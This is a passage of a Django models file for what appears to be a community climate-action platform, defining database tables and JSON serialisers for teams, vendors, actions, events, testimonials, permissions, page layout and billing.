get_json_if_not_none(self.logo) res["is_closed"] = self.is_closed res["is_published"] = self.is_published res["parent"] = get_json_if_not_none(self.parent) return res def full_json(self): data = self.simple_json() # Q: should this be in simple_json? data["communities"] = [c.simple_json() for c in self.communities.all()] data["admins"] = [a.simple_json() for a in self.admins.all()] data["members"] = [m.simple_json() for m in self.members.all()] data["goal"] = get_json_if_not_none(self.goal) data["banner"] = get_json_if_not_none(self.banner) return data class Meta: ordering = ("name",) db_table = "teams" unique_together = [["primary_community", "name"]] class TeamMember(models.Model): id = models.AutoField(primary_key=True) team = models.ForeignKey(Team, on_delete=models.CASCADE) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) is_admin = models.BooleanField(blank=True, default=False) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.user} is {"an ADMIN" if self.is_admin else "a MEMBER"} in Team({self.team})" def simple_json(self): res = model_to_dict(self, ["id", "is_admin"]) res["team"] = get_summary_info(self.team) res["user"] = get_summary_info(self.user) return res def full_json(self): return self.simple_json() class Meta: db_table = "team_members_and_admins" unique_together = [["team", "user"]] class Service(models.Model): """ A class used to represent a Service provided by a Vendor Attributes ---------- name : str name of the service description: str description of this service image: int Foreign Key to a Media file represtenting an image for this service if any icon: str a string description of an icon class for this service if any info: JSON any another dynamic information we would like to store about this Service created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) service_location = models.JSONField(blank=True, null=True) image = models.ForeignKey(Media, blank=True, null=True, on_delete=models.SET_NULL) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) info = models.JSONField(blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict( self, ["id", "name", "description", "service_location", "icon"] ) def full_json(self): return self.simple_json() class Meta: db_table = "services" class ActionProperty(models.Model): """ A class used to represent an Action property. Attributes ---------- name : str name of the Vendor """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) short_description = models.CharField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): return self.full_json() class Meta: verbose_name_plural = "Properties" ordering = ("id",) db_table = "action_properties" class CarbonEquivalency(models.Model): """ Represents an carbon equivalency that can make carbon impact more comprehensible to users. Attributes ---------- name : str Name of the unit used. E.g. "Tree" value: int Value is how many pounds per year of CO2 per unit of this. Use https://www.epa.gov/energy/greenhouse-gas-equivalencies-calculator icon: Graphic representing the appropriate equivalancey. explanation: str Additional information on the equivelancy. E.g. "A typical hardwood tree can absorb as much as 48 pounds of carbon dioxide per year" reference: str Source of information used. Link, book, study, etc. date: DateTime Timestamp of when the equivilancy was last modified. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=50) value = models.FloatField() icon = models.CharField(max_length=50) title = models.CharField(max_length=40, null=True, blank=True) explanation = models.CharField(max_length=100) reference = models.CharField(max_length=100) date = models.DateTimeField(auto_now=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: verbose_name_plural = "CarbonEquivalencies" ordering = ("id",) db_table = "carbon_equivalencies" class TagCollection(models.Model): """ A class used to represent a collection of Tags. Attributes ---------- name : str name of the Tag Collection """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) is_global = models.BooleanField(default=False, blank=True) allow_multiple = models.BooleanField(default=False) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) rank = models.PositiveIntegerField(default=0) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self) res["tags"] = [t.simple_json() for t in self.tag_set.all()] return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "tag_collections" class Tag(models.Model): """ A class used to represent an Tag. It is essentially a string that can be used to describe or group items, actions, etc Attributes ---------- name : str name of the Tag """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) points = models.PositiveIntegerField(null=True, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) tag_collection = models.ForeignKey( TagCollection, null=True, on_delete=models.CASCADE, blank=True ) rank = models.PositiveIntegerField(default=0) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return "%s - %s" % (self.name, self.tag_collection) def simple_json(self): res = model_to_dict(self) res["order"] = self.rank res["tag_collection_name"] = ( None if not self.tag_collection else self.tag_collection.name ) return res def full_json(self): data = self.simple_json() data["tag_collection"] = get_json_if_not_none(self.tag_collection) return data class Meta: ordering = ("rank",) db_table = "tags" unique_together = [["rank", "name", "tag_collection"]] class Vendor(models.Model): """ A class used to represent a Vendor/Contractor that provides a service associated with any of the actions. Attributes ---------- name : str name of the Vendor description: str description of this service logo: int Foreign Key to Media file represtenting the logo for this Vendor banner: int Foreign Key to Media file represtenting the banner for this Vendor address: int Foreign Key for Location of this Vendor key_contact: int Foreign Key for MassEnergize User that is the key contact for this vendor service_area: str Information about whether this vendor provides services nationally, statewide, county or Town services only properties_services: str Whether this vendor services Residential or Commercial units only onboarding_date: DateTime When this vendor was onboard-ed on the MassEnergize Platform for this community onboarding_contact: Which MassEnergize Staff/User onboard-ed this vendor verification_checklist: contains information about some steps and checks needed for due diligence to be done on this vendor eg. Vendor MOU, Reesearch is_verified: boolean When the checklist items are all done and verified then set this as True to confirm this vendor more_info: JSON any another dynamic information we would like to store about this Service created_at: DateTime The date and time that this Vendor was added created_at: DateTime The date and time of the last time any updates were made to the information about this Vendor """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) phone_number = models.CharField(max_length=SHORT_STR_LEN, blank=True) email = models.EmailField(blank=True, null=True, db_index=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) logo = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL, related_name="vender_logo", ) banner = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL, related_name="vendor_banner", ) address = models.JSONField(blank=True, null=True) key_contact = models.JSONField(blank=True, null=True) service_area = models.CharField(max_length=SHORT_STR_LEN) service_area_states = models.JSONField(blank=True, null=True) services = models.ManyToManyField(Service, blank=True) properties_serviced = models.JSONField(blank=True, null=True) onboarding_date = models.DateTimeField(auto_now_add=True) onboarding_contact = models.ForeignKey( UserProfile, blank=True, null=True, on_delete=models.SET_NULL, related_name="onboarding_contact", ) verification_checklist = models.JSONField(blank=True, null=True) is_verified = models.BooleanField(default=False, blank=True) location = models.JSONField(blank=True, null=True) more_info = models.JSONField(blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) communities = models.ManyToManyField( Community, blank=True, related_name="community_vendors" ) tags = models.ManyToManyField(Tag, related_name="vendor_tags", blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def info(self): data = model_to_dict( self, ["id", "name", "service_area", "key_contact", "phone_number", "email"] ) data["logo"] = get_json_if_not_none(self.logo) return data def simple_json(self): data = model_to_dict( self, exclude=[ "logo", "banner", "services", "onboarding_contact", "more_info", "services", "communities", ], ) data["services"] = [s.simple_json() for s in self.services.all()] data["communities"] = [c.simple_json() for c in self.communities.all()] data["tags"] = [t.simple_json() for t in self.tags.all()] data["logo"] = get_json_if_not_none(self.logo) data["website"] = self.more_info and self.more_info.get("website", None) data["key_contact"] = self.key_contact return data def full_json(self): data = model_to_dict( self, exclude=["logo", "banner", "services", "onboarding_contact"] ) data["onboarding_contact"] = get_json_if_not_none(self.onboarding_contact) data["logo"] = get_json_if_not_none(self.logo) data["more_info"] = self.more_info data["tags"] = [t.simple_json() for t in self.tags.all()] data["banner"] = get_json_if_not_none(self.banner) data["services"] = [s.simple_json() for s in self.services.all()] data["communities"] = [c.simple_json() for c in self.communities.all()] data["website"] = self.more_info and self.more_info.get("website", None) data["key_contact"] = self.key_contact data["location"] = self.location return data class Meta: db_table = "vendors" class Action(models.Model): """ A class used to represent an Action that can be taken by a user on this website. Attributes ---------- title : str A short title for this Action. is_global: boolean True if this action is a core action that every community should see or not. False otherwise. about: str More descriptive information about this action. steps_to_take: str Describes the steps that can be taken by an a user for this action; icon: str a string description of the icon class for this action if any image: int Media a Foreign key to an uploaded media file average_carbon_score: the average carbon score for this action as given by the carbon calculator geographic_area: str the Location where this action can be taken created_at: DateTime The date and time that this real estate unity was added created_at: DateTime The date and time of the last time any updates were made to the information about this real estate unit """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=SHORT_STR_LEN, db_index=True) is_global = models.BooleanField(default=False, blank=True) featured_summary = models.TextField(max_length=LONG_STR_LEN, blank=True, null=True) steps_to_take = models.TextField(max_length=LONG_STR_LEN, blank=True) deep_dive = models.TextField(max_length=LONG_STR_LEN, blank=True) about = models.TextField(max_length=LONG_STR_LEN, blank=True) # TODO: this wasn't fully implemented - may remove primary_category # this is the singal category which points will be recorded in, though primary_category = models.ForeignKey( Tag, related_name="action_category", on_delete=models.SET_NULL, null=True ) # then - an action could have multiple secondary categories tags = models.ManyToManyField(Tag, related_name="action_tags", blank=True) geographic_area = models.JSONField(blank=True, null=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="actions" ) properties = models.ManyToManyField(ActionProperty, blank=True) vendors = models.ManyToManyField(Vendor, blank=True) calculator_action = models.ForeignKey( CCAction, blank=True, null=True, on_delete=models.SET_NULL ) average_carbon_score = models.TextField(max_length=SHORT_STR_LEN, blank=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, blank=True, db_index=True ) rank = models.PositiveSmallIntegerField(default=0, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.title def info(self): return model_to_dict(self, ["id", "title"]) def simple_json(self): data = model_to_dict( self, [ "id", "is_published", "is_deleted", "title", "is_global", "icon", "rank", "average_carbon_score", "featured_summary", ], ) data["image"] = get_json_if_not_none(self.image) data["calculator_action"] = get_summary_info(self.calculator_action) data["tags"] = [t.simple_json() for t in self.tags.all()] data["steps_to_take"] = self.steps_to_take data["deep_dive"] = self.deep_dive data["about"] = self.about data["community"] = get_summary_info(self.community) data["vendors"] = [v.info() for v in self.vendors.all()] return data def full_json(self): data = self.simple_json() data["is_global"] = self.is_global data["steps_to_take"] = self.steps_to_take data["about"] = self.about data["geographic_area"] = self.geographic_area data["properties"] = [p.simple_json() for p in self.properties.all()] data["vendors"] = [v.simple_json() for v in self.vendors.all()] return data class Meta: ordering = ["rank", "title"] db_table = "actions" unique_together = [["title", "community"]] class Event(models.Model): """ A class used to represent an Event. Attributes ---------- name : str name of the event description: str more details about this event start_date_and_time: Datetime when the event starts (both the day and time) end_date_and_time: Datetime when the event ends location: Location where the event is taking place tags: ManyToMany tags on this event to help in easily filtering image: Media Foreign key linking to the image attached to this event. archive: boolean True if this event should be archived is_global: boolean True if this action is an event that every community should see or not. False otherwise. is_recurring: boolean if the event is recurring, this value is True and it has a RecurringPattern instance attached to it. recurring_details: JSON stores information about the recurrence pattern of the event if is_recurring = True """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) featured_summary = models.TextField(max_length=LONG_STR_LEN, blank=True, null=True) description = models.TextField(max_length=LONG_STR_LEN) community = models.ForeignKey(Community, on_delete=models.CASCADE, null=True) invited_communities = models.ManyToManyField( Community, related_name="invited_communites", blank=True ) start_date_and_time = models.DateTimeField(db_index=True) end_date_and_time = models.DateTimeField(db_index=True) location = models.JSONField(blank=True, null=True) tags = models.ManyToManyField(Tag, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="events" ) archive = models.BooleanField(default=False, blank=True) is_global = models.BooleanField(default=False, blank=True) external_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_external_event = models.BooleanField(default=False, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) rank = models.PositiveIntegerField(default=0, blank=True, null=True) is_recurring = models.BooleanField(default=False, blank=True, null=True) recurring_details = models.JSONField(blank=True, null=True) def __str__(self): return self.name def simple_json(self): data = model_to_dict( self, exclude=["tags", "image", "community", "invited_communities"] ) data["start_date_and_time"] = self.start_date_and_time data["end_date_and_time"] = self.end_date_and_time data["tags"] = [t.simple_json() for t in self.tags.all()] data["community"] = get_json_if_not_none(self.community) data["image"] = None if not self.image else self.image.full_json() data["invited_communities"] = [ c.simple_json() for c in self.invited_communities.all() ] data["more_info"] = self.more_info return data def full_json(self): return self.simple_json() class Meta: ordering = ( "rank", "-start_date_and_time", ) db_table = "events" # leaner class that stores information about events that have already passed # in the future, can use this class to revive events that may have been archived class PastEvent(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) description = models.TextField(max_length=LONG_STR_LEN) start_date_and_time = models.DateTimeField() community = models.ForeignKey(Community, on_delete=models.CASCADE) class RecurringEventException(models.Model): """ A class used to represent a RESCHEDULING of a recurring event. Attributes ---------- event: Event stores the recurring event that the exception is attached to rescheduled_event: Event if the event instance is rescheduled, a new Event is created representing the rescheduled event instance is_cancelled : boolean True if the event has been cancelled by CAdmin is_rescheduled: boolean True if event has been rescheduled by CAdmin former_time: dateTime Tells us when the instance was originally scheduled. Helps us figure out when to delete RecurringEventException """ id = models.AutoField(primary_key=True) event = models.ForeignKey( Event, on_delete=models.CASCADE, related_name="recurring_event" ) rescheduled_event = models.ForeignKey( Event, on_delete=models.CASCADE, blank=True, null=True ) # shouldnt be this way - blank should be false, but I don't know what to set the default to former_time = models.DateTimeField(null=True, blank=True) def __str__(self): return str(self.id) def simple_json(self): data = model_to_dict(self, exclude=["event", "rescheduled_event"]) data["id"] = str(self.id) data["former_time"] = str(self.former_time) data["event"] = self.event.id data["rescheduled_start_time"] = str(self.rescheduled_event.start_date_and_time) data["rescheduled_end_time"] = str(self.rescheduled_event.end_date_and_time) return data class EventAttendee(models.Model): """ A class used to represent events and attendees Attributes ---------- user : Foreign Key of the User Which user this applies to status: str Tells if the user is just interested, RSVP-ed or saved for later. event: int Foreign Key to event that the user has responded to. """ id = models.AutoField(primary_key=True) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) event = models.ForeignKey(Event, on_delete=models.CASCADE) status = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("EVENT_CHOICES", {}).items() ) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "%s | %s | %s" % (self.user, self.status, self.event) def simple_json(self): data = model_to_dict(self, ["id", "status"]) data["user"] = self.user.info() data["event"] = self.event.info() return data def full_json(self): return self.simple_json() class Meta: verbose_name_plural = "Event Attendees" db_table = "event_attendees" unique_together = [["user", "event"]] class Permission(models.Model): """ A class used to represent Permission(s) that are required by users to perform any tasks on this platform. Attributes ---------- name : str name of the Vendor """ id = models.AutoField(primary_key=True) name = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("PERMISSION_TYPES", {}).items(), db_index=True, ) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return CHOICES.get("PERMISSION_TYPES", {})[self.name] def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "permissions" class UserPermissions(models.Model): """ A class used to represent Users and what they can do. Attributes ---------- who : int the user on this site can_do: int Foreign Key desscribing the policy that they can perform """ id = models.AutoField(primary_key=True) who = models.ForeignKey(Role, on_delete=models.CASCADE) can_do = models.ForeignKey(Permission, on_delete=models.CASCADE) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "(%s) can (%s)" % (self.who, self.can_do) def simple_json(self): return { "id": self.id, "who": get_json_if_not_none(self.who), "can_do": get_json_if_not_none(self.can_do), } def full_json(self): return self.simple_json() class Meta: ordering = ("who",) db_table = "user_permissions" class Testimonial(models.Model): """ A class used to represent a Testimonial shared by a user. Attributes ---------- title : str title of the testimony body: str (HTML) more information for this testimony. is_approved: boolean after the community admin reviews this, he can check the box """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=SHORT_STR_LEN, db_index=True) body = models.TextField(max_length=LONG_STR_LEN) is_approved = models.BooleanField(default=False, blank=True) tags = models.ManyToManyField(Tag, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="testimonials", ) user = models.ForeignKey( UserProfile, on_delete=models.CASCADE, db_index=True, null=True ) action = models.ForeignKey( Action, on_delete=models.CASCADE, null=True, db_index=True ) vendor = models.ForeignKey( Vendor, on_delete=models.SET_NULL, null=True, blank=True, db_index=True ) community = models.ForeignKey( Community, on_delete=models.CASCADE, blank=True, null=True, db_index=True ) rank = models.PositiveSmallIntegerField(default=0) created_at = models.DateTimeField(auto_now_add=True, blank=True) updated_at = models.DateTimeField(auto_now=True, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) anonymous = models.BooleanField(default=False, blank=True) preferred_name = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) other_vendor = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) def __str__(self): return self.title def info(self): return model_to_dict(self, fields=["id", "title", "community"]) def _get_user_info(self): return get_json_if_not_none(self.user) or { "full_name": "User unknown", "email": "e-mail address not provided", } def simple_json(self): res = model_to_dict(self, exclude=["image", "tags"]) res["user"] = self._get_user_info() res["action"] = get_json_if_not_none(self.action) res["vendor"] = None if not self.vendor else self.vendor.info() res["community"] = get_json_if_not_none(self.community) res["created_at"] = self.created_at.date() res["file"] = get_json_if_not_none(self.image) res["tags"] = [t.simple_json() for t in self.tags.all()] res["anonymous"] = self.anonymous res["preferred_name"] = self.preferred_name res["other_vendor"] = self.other_vendor return res def full_json(self): data = self.simple_json() data["image"] = data.get("file", None) data["tags"] = [t.simple_json() for t in self.tags.all()] return data class Meta: ordering = ("rank",) db_table = "testimonials" class UserActionRel(models.Model): """ A class used to represent a user and his/her relationship with an action. Whether they marked an action as todo, done, etc Attributes ---------- user : int Foreign Key for user real_estate_unit: Foreign key for the real estate unit this action is related to. action: int which action they marked vendor: which vendor they choose to contact/connect with status: Whether they marked it as todo, done or save for later date_completed: If specified, the date when they completed the action carbon_impact: Carbon reduction calculated by the Carbon Calculator """ id = models.AutoField(primary_key=True) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE, db_index=True) real_estate_unit = models.ForeignKey(RealEstateUnit, on_delete=models.CASCADE) action = models.ForeignKey(Action, on_delete=models.CASCADE) vendor = models.ForeignKey(Vendor, on_delete=models.SET_NULL, null=True, blank=True) status = models.CharField( max_length=SHORT_STR_LEN, choices=CHOICES.get("USER_ACTION_STATUS", {}).items(), db_index=True, default="TODO", ) date_completed = models.DateField(blank=True, null=True) carbon_impact = models.IntegerField( default=0 ) # that which was calculated by the Carbon Calculator created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def simple_json(self): return { "id": self.id, "user": get_json_if_not_none(self.user), "action": get_json_if_not_none(self.action), "real_estate_unit": get_json_if_not_none(self.real_estate_unit), "status": self.status, "date_completed": self.date_completed, "carbon_impact": self.carbon_impact, } def full_json(self): res = self.simple_json() res["vendor"] = get_json_if_not_none(self.vendor) return res def __str__(self): return "%s | %s | (%s)" % (self.user, self.status, self.action) class Meta: ordering = ("status", "user", "action") unique_together = [["user", "action", "real_estate_unit"]] class CommunityAdminGroup(models.Model): """ This represents a binding of a group of users and a community for which they are admin for. Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, blank=True) members = models.ManyToManyField(UserProfile, blank=True) is_deleted = models.BooleanField(default=False, blank=True) pending_admins = models.JSONField(blank=True, null=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self, exclude=["members"]) res["community"] = get_json_if_not_none(self.community) res["members"] = [m.simple_json() for m in self.members.all()] return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "community_admin_group" class UserGroup(models.Model): """ This represents a binding of a group of users and a community and the permissions they have. Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey( Community, on_delete=models.CASCADE, blank=True, db_index=True ) members = models.ManyToManyField(UserProfile, blank=True) permissions = models.ManyToManyField(Permission, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self, exclude=["members", "permissions"]) def full_json(self): data = self.simple_json() data["community"] = get_json_if_not_none(self.community) data["members"] = [m.simple_json() for m in self.members.all()] data["permissions"] = [p.simple_json() for p in self.permissions.all()] return data class Meta: ordering = ("name",) db_table = "user_groups" class Data(models.Model): """Instances of data points Attributes ---------- name : str name of the statistic value: decimal The value of the statistic goes here info: JSON dynamic information goes in here. The symbol and other info goes here community: int foreign key linking a community to this statistic """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, db_index=True) value = models.PositiveIntegerField(default=0) reported_value = models.PositiveIntegerField(default=0) denominator = models.CharField(max_length=SHORT_STR_LEN, blank=True) symbol = models.CharField(max_length=LONG_STR_LEN, blank=True) tag = models.ForeignKey( Tag, blank=True, on_delete=models.CASCADE, null=True, db_index=True ) community = models.ForeignKey( Community, blank=True, on_delete=models.SET_NULL, null=True, db_index=True ) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return "%s | %s (%d) |(%s)" % (self.community, self.name, self.value, self.tag) def simple_json(self): return model_to_dict(self, fields=["id", "name", "value", "reported_value"]) def full_json(self): data = self.simple_json() data["tag"] = get_json_if_not_none(self.tag) data["community"] = get_json_if_not_none(self.community) return data class Meta: verbose_name_plural = "Data" ordering = ("name", "value") db_table = "data" class Graph(models.Model): """Instances keep track of a statistic from the admin Attributes ---------- title : str the title of this graph type: str the type of graph to be plotted eg. pie chart, bar chart etc data: JSON data to be plotted on this graph """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=LONG_STR_LEN, db_index=True) graph_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("GRAPH_TYPES", {}).items() ) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, blank=True ) data = models.ManyToManyField(Data, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def simple_json(self): return model_to_dict(self, fields=["title", "community", "is_published"]) def full_json(self): res = self.simple_json() res["data"] = [d.simple_json() for d in self.data.all()] return res def __str__(self): return self.title class Meta: verbose_name_plural = "Graphs" ordering = ("title",) class Button(models.Model): """Buttons on the pages""" text = models.CharField(max_length=SHORT_STR_LEN, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) url = models.CharField(max_length=SHORT_STR_LEN, blank=True) color = models.CharField(max_length=SHORT_STR_LEN, blank=True) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return self.text def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("text",) class SliderImage(models.Model): """Model the represents the database for Images that will be inserted into slide shows Attributes ---------- title : str title of the page section subtitle: str sub title for this image as should appear on the slider buttons: JSON a json list of buttons with each containing text, link, icon, color etc """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True, db_index=True) subtitle = models.CharField(max_length=LONG_STR_LEN, blank=True) image = models.ForeignKey(Media, on_delete=models.SET_NULL, null=True, blank=True) buttons = models.ManyToManyField(Button, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.title def simple_json(self): return { "id": self.id, "title": self.title, "image": get_json_if_not_none(self.image), } def full_json(self): res = self.simple_json() res["buttons"] = [b.simple_json() for b in self.buttons.all()] return res class Meta: verbose_name_plural = "Slider Images" db_table = "slider_images" class Slider(models.Model): """ Model that represents a model for a slider/carousel on the website Attributes ---------- name : str name of the page section description: str a description of this slider info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, blank=True, db_index=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) slides = models.ManyToManyField(SliderImage, blank=True) is_global = models.BooleanField(default=False, blank=True) community = models.ForeignKey( Community, on_delete=models.CASCADE, null=True, blank=True ) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return { "id": self.id, "name": self.name, "description": self.description, } def full_json(self): res = self.simple_json() res["slides"] = [s.full_json() for s in self.slides.all()] return res class Menu(models.Model): """Represents items on the menu/navigation bar (top-most bar on the webpage) Attributes ---------- name : str name of the page section content: JSON the content is represented as a json """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, unique=True) content = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("name",) class Card(models.Model): """Buttons on the pages""" title = models.CharField(max_length=SHORT_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) link = models.CharField(max_length=SHORT_STR_LEN, blank=True) media = models.ForeignKey(Media, blank=True, on_delete=models.SET_NULL, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return self.title def simple_json(self): return { "title": self.title, "description": self.description, "icon": self.icon, "link": self.link, "media": get_json_if_not_none(self.media), } def full_json(self): return self.simple_json() class Meta: ordering = ("title",) class PageSection(models.Model): """ A class used to represent a PageSection #TODO: what about page sections like a gallery, slideshow, etc? Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) title = models.CharField(max_length=SHORT_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) image = models.ForeignKey(Media, on_delete=models.SET_NULL, null=True, blank=True) cards = models.ManyToManyField(Card, blank=True) buttons = models.ManyToManyField(Button, blank=True) slider = models.ForeignKey(Slider, on_delete=models.SET_NULL, null=True, blank=True) graphs = models.ManyToManyField(Graph, blank=True, related_name="graphs") info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self, ["id", "name", "title", "description"]) def full_json(self): res = self.simple_json() res["image"] = get_json_if_not_none(self.image) res["cards"] = [c.simple_json() for c in self.cards.all()] res["buttons"] = ([b.simple_json() for b in self.buttons.all()],) res["slider"] = (get_json_if_not_none(self.slider, True),) res["graphs"] = ([g.full_json() for g in self.graphs.all()],) res["info"] = self.info return res class Page(models.Model): """ A class used to represent a Page on a community portal eg. The home page, about-us page, etc Attributes ---------- title : str title of the page description: str the description of the page community: int Foreign key for which community this page is linked to sections: ManyToMany all the different parts/sections that go on this page content: JSON dynamic info for this page goes here. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) sections = models.ManyToManyField(PageSection, blank=True) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.name} - {self.community.name}" def simple_json(self): res = model_to_dict(self, ["id", "name", "description"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["sections"] = [s.full_json() for s in self.sections.all()] res["info"] = self.info return res class Meta: unique_together = [["name", "community"]] class BillingStatement(models.Model): """ A class used to represent a Billing Statement Attributes ---------- name : str name of the statement. amount: decimal the amount of money owed description: the breakdown of the bill for this community community: int Foreign Key to the community to whom this bill is associated. start_date: Datetime the start date from which the charges were incurred end_date: the end date up to which this charge was incurred. more_info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) amount = models.CharField(max_length=SHORT_STR_LEN, default="0.0") description = models.TextField(max_length=LONG_STR_LEN, blank=True) start_date = models.DateTimeField(blank=True, db_index=True) end_date = models.DateTimeField(blank=True) more_info = models.JSONField(blank=True, null=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, db_index=True ) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self, exclude=["community"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): return 